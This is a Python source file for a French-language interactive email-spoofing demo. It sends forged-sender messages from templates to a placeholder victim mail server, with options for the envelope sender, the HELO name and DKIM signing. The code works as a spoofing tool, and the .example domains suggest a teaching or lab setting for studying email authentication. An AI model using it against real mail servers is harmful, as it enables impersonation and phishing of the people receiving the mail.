325 lines
10 KiB
Python
Executable File
325 lines
10 KiB
Python
Executable File
#!/usr/bin/env python3
|
||
|
||
from argparse import ArgumentParser
|
||
from email.message import EmailMessage
|
||
import email.utils
|
||
import importlib.resources
|
||
import json
|
||
import pathlib
|
||
import re
|
||
import smtplib
|
||
import sys
|
||
import uuid
|
||
|
||
import dkim
|
||
from rich.console import Console
|
||
import rich.highlighter
|
||
import rich.panel
|
||
from rich.prompt import Confirm, Prompt
|
||
import rich.text
|
||
from rich.theme import Theme
|
||
|
||
import spoof_templates
|
||
|
||
DEFAULT_HELO = "attaquant.example"
|
||
ATTACKER_DOMAIN = "attaquant.example"
|
||
ATTACKER_MAIL_FROM = "usurpateur@attaquant.example"
|
||
VICTIM_NAME = "Destinataire"
|
||
VICTIM_DOMAIN = "destinataire.example"
|
||
VICTIM_MX = "mx.destinataire.example"
|
||
VICTIM_ADDRESS = f"destinataire@{VICTIM_DOMAIN}"
|
||
|
||
|
||
class SMTPHighlighter(rich.highlighter.Highlighter):
|
||
patterns = {
|
||
'helo': r'(?:HELO|EHLO) (?P<helo>.*)',
|
||
'mail_from': r'MAIL FROM:<(?P<mail_from>.*?)>',
|
||
'rcpt_to': r'RCPT TO:<(?P<rcpt_to>.*)>',
|
||
'data': r'From: (?P<data_display_name>.* <(?P<data_from>.*)>)'
|
||
}
|
||
|
||
def __init__(self, **kwargs):
|
||
super().__init__(**kwargs)
|
||
self.state = 'connect'
|
||
|
||
def highlight(self, text):
|
||
if pattern := SMTPHighlighter.patterns.get(self.state, None):
|
||
if mobj := re.match(pattern, text.plain):
|
||
for style in mobj.groupdict().keys():
|
||
start, end = mobj.start(style), mobj.end(style)
|
||
text.stylize(style, start, end)
|
||
|
||
|
||
|
||
|
||
custom_theme = Theme({
|
||
"banner": "bold red",
|
||
"incoming": "yellow",
|
||
"outgoing": "cyan",
|
||
"helo": "bold sea_green1",
|
||
"mail_from": "bold underline sky_blue1",
|
||
"rcpt_to": "bold underline pale_violet_red1",
|
||
"data_from": "bold underline medium_purple1",
|
||
"data_display_name": "medium_purple1",
|
||
"comment": "#777777",
|
||
"failure": "bold red",
|
||
"success": "green",
|
||
"text": "default"
|
||
})
|
||
console = Console(highlighter=None, theme=custom_theme)
|
||
|
||
|
||
class SMTP(smtplib.SMTP):
|
||
def __init__(self, output, **kwargs):
|
||
super().__init__(**kwargs)
|
||
self.highlighter = SMTPHighlighter()
|
||
self.log = [];
|
||
self.output = output
|
||
|
||
def trace(self, s, direction):
|
||
if direction not in ['in', 'out']:
|
||
raise ValueError("direction must be 'in' or 'out'")
|
||
|
||
arrows = {'in': '[incoming]←[/]', 'out': '[outgoing]→[/]'}
|
||
max_lines = 4
|
||
|
||
if isinstance(s, bytes):
|
||
s = s.decode('utf-8')
|
||
|
||
lines = [{'class': 'text', 'text': text} for text in s.splitlines()]
|
||
|
||
# lines = [self.highlighter(rich.text.Text(line)) for line in s.splitlines()]
|
||
if len(lines) > max_lines:
|
||
suppressed_count = len(lines[max_lines:-1])
|
||
if suppressed_count > 1:
|
||
suppressed_text = f"{suppressed_count} lignes omises"
|
||
else:
|
||
suppressed_text = f"{suppressed_count} ligne omise"
|
||
suppressed_obj = {'class': 'comment', 'text': suppressed_text}
|
||
|
||
lines = lines[:max_lines] + [suppressed_obj] + lines[-1:]
|
||
|
||
# Print the text on the console
|
||
if self.output:
|
||
for i, l in enumerate(lines):
|
||
prefix = arrows[direction] if i == 0 else " "
|
||
console.print(f" {prefix} ", end=None)
|
||
console.print(l['text'], style=l['class'])
|
||
|
||
if direction == 'in':
|
||
console.print()
|
||
|
||
# Save it internally too
|
||
self.log.append({'direction': direction, 'lines': lines})
|
||
|
||
def putcmd(self, cmd, args=''):
|
||
super().putcmd(cmd.upper(), args)
|
||
|
||
def send(self, s):
|
||
self.trace(s, 'out')
|
||
super().send(s)
|
||
|
||
def getreply(self):
|
||
errcode, errmsg = super().getreply()
|
||
lines = errmsg.decode('us-ascii').splitlines()
|
||
lines = [
|
||
f"{errcode}{' ' if i == len(lines) - 1 else '-'}{line}"
|
||
for i, line in enumerate(lines)
|
||
]
|
||
self.trace('\n'.join(lines), 'in')
|
||
return errcode, errmsg
|
||
|
||
def connect(self, *args, **kwargs):
|
||
self.log.append({'direction': 'comment',
|
||
'lines': [{'class': 'comment',
|
||
'text': 'Connexion établie au serveur'}]})
|
||
return super().connect(*args, **kwargs)
|
||
|
||
def ehlo(self, *args, **kwargs):
|
||
self.highlighter.state = 'helo'
|
||
return super().ehlo(*args, **kwargs)
|
||
|
||
def mail(self, *args, **kwargs):
|
||
self.highlighter.state = 'mail_from'
|
||
return super().mail(*args, **kwargs)
|
||
|
||
def rcpt(self, *args, **kwargs):
|
||
self.highlighter.state = 'rcpt_to'
|
||
return super().rcpt(*args, **kwargs)
|
||
|
||
def data(self, *args):
|
||
self.highlighter.state = 'data'
|
||
return super().data(*args)
|
||
|
||
|
||
|
||
def ask_helo():
|
||
response = Prompt.ask("Nom d’hôte dans le [helo]HELO[/helo]",
|
||
console=console,
|
||
default=DEFAULT_HELO)
|
||
return response
|
||
|
||
def ask_mail_from(default_mail_from):
|
||
console.print("Adresse RFC5321.MailFrom :")
|
||
console.print(f" 1. Utiliser le même que le RFC5322.From ([b]{default_mail_from}[/])")
|
||
console.print(f" 2. Remplacer par une adresse qu’on maîtrise ([b]{ATTACKER_MAIL_FROM}[/])")
|
||
console.print()
|
||
choices = {
|
||
1: default_mail_from,
|
||
2: ATTACKER_MAIL_FROM
|
||
}
|
||
while True:
|
||
try:
|
||
response = Prompt.ask("Choix", console=console)
|
||
result = choices[int(response)]
|
||
console.print(f" ⇒ [mail_from]{result}[/]")
|
||
return result
|
||
except ValueError:
|
||
pass
|
||
except IndexError:
|
||
pass
|
||
|
||
|
||
def add_dkim_signature(email):
|
||
if Confirm.ask("Ajouter une signature DKIM ?", choices="on", default=False):
|
||
email_bytes = email.as_string().encode('utf-8')
|
||
selector = Prompt.ask("Sélecteur")
|
||
private_key = pathlib.Path(f"{selector}.private").read_bytes()
|
||
selector = selector.encode('ascii')
|
||
domain = Prompt.ask("Domaine", default=ATTACKER_DOMAIN).encode('ascii')
|
||
signature_line = dkim.dkim_sign(email_bytes, selector, domain, private_key).decode('ascii')
|
||
signature = re.match("^DKIM-Signature: (.*)\r\n", signature_line, re.DOTALL).group(1)
|
||
console.print(" ⇒ Signature DKIM ajoutée")
|
||
email['DKIM-Signature'] = signature
|
||
else:
|
||
console.print(" ⇒ Pas de signature DKIM")
|
||
|
||
return email
|
||
|
||
|
||
|
||
def generate_email(template):
|
||
msg = template.msg
|
||
msg['To'] = f"{VICTIM_NAME} <{VICTIM_ADDRESS}>"
|
||
msg['Date'] = email.utils.formatdate()
|
||
msg['Message-ID'] = f"{uuid.uuid4()}@{DEFAULT_HELO}"
|
||
if not msg['Content-Type']:
|
||
msg['Content-Type'] = "text/plain; charset=utf-8"
|
||
|
||
return msg
|
||
|
||
|
||
def ask_template():
|
||
templates = spoof_templates.spoof_templates()
|
||
console.print("[bold]Sélectionner un scénario :[/]")
|
||
for i, template in enumerate(templates):
|
||
console.print(f"{i + 1:4}. {template.nice_name}")
|
||
console.print()
|
||
|
||
while True:
|
||
try:
|
||
response = Prompt.ask("Choix")
|
||
result = templates[int(response) - 1]
|
||
console.print(f" ⇒ [bold]{result.nice_name}[/]")
|
||
console.print()
|
||
return result
|
||
except ValueError:
|
||
pass
|
||
except IndexError:
|
||
pass
|
||
|
||
|
||
|
||
|
||
def send_email(helo, envelope_from, email, output=True):
|
||
data = email.as_string().encode('utf-8')
|
||
with SMTP(local_hostname=helo, output=output) as smtp:
|
||
try:
|
||
smtp.connect(VICTIM_MX)
|
||
smtp.sendmail(envelope_from, VICTIM_ADDRESS, data)
|
||
return {'outcome': 'success', 'log': smtp.log}
|
||
except smtplib.SMTPException:
|
||
return {'outcome': 'failure', 'log': smtp.log}
|
||
except:
|
||
raise
|
||
|
||
|
||
def interactive_main():
|
||
try:
|
||
console.print(
|
||
rich.panel.Panel(
|
||
"🕱 Outil d’usurpation d’identité de courriel 🕱",
|
||
style="banner",
|
||
width=80))
|
||
console.print()
|
||
|
||
template = ask_template()
|
||
display_name, rfc5322from = re.match('(.*) <(.*)>', template.msg['From']).groups()
|
||
console.print(f"Adresse RFC5322.From (tirée du scénario):")
|
||
console.print(f" ⇒ [data_display_name]{display_name} <[data_from]{rfc5322from}[/data_from]>[/]")
|
||
console.print()
|
||
|
||
envelope_from = ask_mail_from(rfc5322from)
|
||
console.print()
|
||
|
||
helo = ask_helo()
|
||
console.print()
|
||
|
||
email = generate_email(template)
|
||
signed_email = add_dkim_signature(email)
|
||
|
||
results = send_email(helo, envelope_from, signed_email, output=True)
|
||
if results['outcome'] == 'success':
|
||
console.print(" [success]✔[/] Message [success]accepté[/] par le serveur SMTP")
|
||
elif results['outcome'] == 'failure':
|
||
console.print(" [failure]✘[/] Message [failure]rejeté[/] par le serveur SMTP")
|
||
|
||
except KeyboardInterrupt:
|
||
console.print()
|
||
pass
|
||
except:
|
||
raise
|
||
|
||
|
||
|
||
def main():
|
||
parser = ArgumentParser()
|
||
parser.add_argument('--non-interactive', default=False, action='store_true')
|
||
parser.add_argument('--get-config', default=False, action='store_true')
|
||
parser.add_argument('--template')
|
||
parser.add_argument('--replace-rfc5321-mail-from', default=False, action='store_true')
|
||
parser.add_argument('--helo', default=DEFAULT_HELO)
|
||
|
||
args = parser.parse_args()
|
||
|
||
if args.non_interactive:
|
||
if args.get_config:
|
||
config = {
|
||
'default_helo': DEFAULT_HELO,
|
||
'my_mail_from': ATTACKER_MAIL_FROM,
|
||
'templates': [{'id': t.name,
|
||
'name': t.nice_name,
|
||
'from_name': re.match('(.*) <(.*)>', t.msg['From']).group(1),
|
||
'from_address': re.match('(.*) <(.*)>', t.msg['From']).group(2)}
|
||
for t in spoof_templates.spoof_templates()]
|
||
}
|
||
|
||
print(json.dumps(config))
|
||
else:
|
||
templates = {t.name: t for t in spoof_templates.spoof_templates()}
|
||
template = templates[args.template]
|
||
rfc5322from, = re.match('.* <(.*)>', template.msg['From']).groups()
|
||
if args.replace_rfc5321_mail_from:
|
||
envelope_from = ATTACKER_MAIL_FROM
|
||
else:
|
||
envelope_from = rfc5322from
|
||
|
||
email = generate_email(template)
|
||
results = send_email(args.helo, envelope_from, email, output=False)
|
||
print(json.dumps(results))
|
||
else:
|
||
interactive_main()
|
||
|
||
if __name__ == '__main__':
|
||
main()
|